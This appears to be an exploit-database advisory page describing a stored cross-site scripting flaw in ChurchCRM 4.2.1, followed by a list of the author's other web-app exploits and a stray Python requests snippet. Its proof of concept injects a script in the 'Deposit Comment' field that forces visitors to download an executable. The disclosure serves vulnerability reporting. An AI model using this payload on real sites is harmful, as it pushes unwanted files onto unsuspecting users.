Author
"Mufaddal Masalawala"
Platform
multiple
Release date
2020-12-02
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | #Exploit Title: ChurchCRM 4.2.1- Persistent Cross Site Scripting(XSS) #Date: 2020- 10- 29 #Exploit Author: Mufaddal Masalawala #Vendor Homepage: https://churchcrm.io/ #Software Link: https://github.com/ChurchCRM/CRM #Version: 4.2.1 #Tested on: Kali Linux 2020.3 #Proof Of Concept: ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit. There are multiple locations where this can be replicated To exploit this vulnerability: 1. Login to the application, go to 'View all Deposits' module. 2. Add the payload ( <script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script> ) in the 'Deposit Comment' field and click "Add New Deposit". 3. Payload is executed and a .exe file is downloaded. |
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-12-02 | "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" | webapps | php | "Mufaddal Masalawala" |
2020-12-02 | "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" | webapps | multiple | "Mufaddal Masalawala" |
2020-12-02 | "ChurchCRM 4.2.0 - CSV/Formula Injection" | webapps | multiple | "Mufaddal Masalawala" |
2020-12-02 | "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" | webapps | php | "Mufaddal Masalawala" |
2020-12-01 | "Tendenci 12.3.1 - CSV/ Formula Injection" | webapps | multiple | "Mufaddal Masalawala" |
2020-11-10 | "Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection" | webapps | php | "Mufaddal Masalawala" |
2020-09-07 | "grocy 2.7.1 - Persistent Cross-Site Scripting" | webapps | php | "Mufaddal Masalawala" |
import requests
response = requests.get('http://127.0.0.1:8181?format=json')
For full documentation follow the link above